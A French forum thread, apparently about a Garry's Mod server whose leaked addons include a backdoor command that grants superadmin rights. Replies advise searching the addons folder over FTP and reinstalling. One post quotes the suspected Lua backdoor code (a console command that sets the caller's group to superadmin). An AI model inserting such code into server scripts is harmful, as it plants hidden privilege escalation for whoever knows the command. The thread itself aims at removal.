- Initiateur de la discussion
X
xkill377
Geek suprême
- Score réaction
- 63
suppr
Dernière édition:
je vais lui dire merciKiwii à dit:Sinon pour le faire plus facilement avec filezilla
Il doit glisser le dossier sur son bureau ensuite il doit chercher dans "CTRL F" ya une option pour rechercher dans un dossier .xkill377 à dit:sur filezilla il y a un truc pour rechercher des fichiers mais pas à l'interieur de tout les fichiers d'un dossier
thepostaldudexkill377 à dit:j'ai un pote qui fait un serveur et qui possède une backdoor dessus celle du F10 -> thepostaldude
et la le joueur devient superadmin
c'est quel addons qui fait sa ?
Merci
Dit lui qui supprime tout ^^ et qu il réinstalle en faisant a chaque fois de reeboot quand il installe un scriptxkill377 à dit:Il a serveur un full leak mais moi je lui passe pas les miens donc il se débrouille avec ce qui peut , je pense pas que pour l'instant il peut enlever les leaks .
Déjà je vais lui dire que il a une backdoor après je le laisserai chercher.
Merci
Avec l'accès FTP juste parti addons, en 30 seconde elle est trouvé... Faire CTRL F rien de plus simple.xkill377 à dit:Il a serveur un full leak mais moi je lui passe pas les miens donc il se débrouille avec ce qui peut , je pense pas que pour l'instant il peut enlever les leaks .
Déjà je vais lui dire que il a une backdoor après je le laisserai chercher.
Merci
shitty backdoor , no funfloppys62138 à dit:Je c'est c'est le quel de backdoor il le semble que un pote lavais il etais dans le script Enforcer !
Voila derien !
Enleve se truc :
concommand.Add("thepostaldude", function(player)
player:SetUserGroup("superadmin")
end)
La commande doit etre sa mais pas sur !
C'est cadeau !
ouaiYoh Sambre ♪ à dit:shitty backdoor , no fun